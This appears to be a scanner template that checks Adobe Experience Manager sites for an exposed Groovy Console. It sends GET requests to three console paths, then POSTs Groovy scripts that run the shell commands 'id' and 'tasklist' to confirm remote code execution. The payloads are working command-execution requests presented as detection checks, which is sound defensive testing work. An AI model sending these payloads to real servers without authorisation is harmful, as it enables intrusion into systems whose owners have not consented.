id: aem-groovy-rce
donce: true
info:
  name: AEM Groovy Console Exposed
  risk: Critical

params:
  - root: "{{.BaseURL}}"

variables:
  - groovy: |
      /bin/groovyconsole/audit.servlet
      /bin/groovyconsole/post.json
      /etc/groovyconsole.html
requests:
  - method: GET
    redirect: false
    url: >-
      {{.root}}{{.groovy}}
    headers:
      - User-Agent: curl/123
      - Referer: '{{.BaseURL}}'
    detections:
      - >-
        StatusCode() == 200 && StringSearch("response", "Groovy Console")
      - >-
        StatusCode() == 200 && StringSearch("response", "groovy.lang")
      - >-
        StatusCode() == 200 && StringSearch("response", "ace/mode/groovy_highlight_rules")
      - >-
        StatusCode() == 200 && StringSearch("response", '{"data":[') && StringSearch("response", "Content-Type: image/png")
  # run id command
  - method: POST
    redirect: false
    headers:
      - User-Agent: curl/123
      - CSRF-Token: undefined
      - X-Requested-With: XMLHttpRequest
      - Content-Type: application/x-www-form-urlencoded; charset=UTF-8
      - Referer: '{{.BaseURL}}'
    url: >-
      {{.root}}{{.groovy}}
    body: |
      script=def+proc+%3D+%22id%22.execute()%0Adef+b+%3D+new+StringBuffer()%0Aproc.consumeProcessErrorStream(b)%0Aprintln+proc.text%0Aprintln+b.toString()&data=
    detections:
      - >-
        StatusCode() == 200 && StringSearch("response", '{"output":"uid=')
      - >-
        StatusCode() == 200 && StringSearch("response", '{"output":"') && StringSearch("body", "java.lang.ProcessImpl.start")
  # run tasklist command
  - method: POST
    redirect: false
    headers:
      - User-Agent: curl/123
      - Referer: '{{.BaseURL}}'
      - CSRF-Token: undefined
      - X-Requested-With: XMLHttpRequest
      - Content-Type: application/x-www-form-urlencoded; charset=UTF-8
      - Referer: '{{.BaseURL}}'
    url: >-
      {{.root}}{{.groovy}}
    body: |
      script=def+proc+%3D+%22tasklist%22.execute()%0Adef+b+%3D+new+StringBuffer()%0Aproc.consumeProcessErrorStream(b)%0Aprintln+proc.text%0Aprintln+b.toString()&data=
    detections:
      - >-
        StatusCode() == 200 && StringSearch("response", '{"output":"') && StringSearch("body", "PID") && StringSearch("body", ".exe")
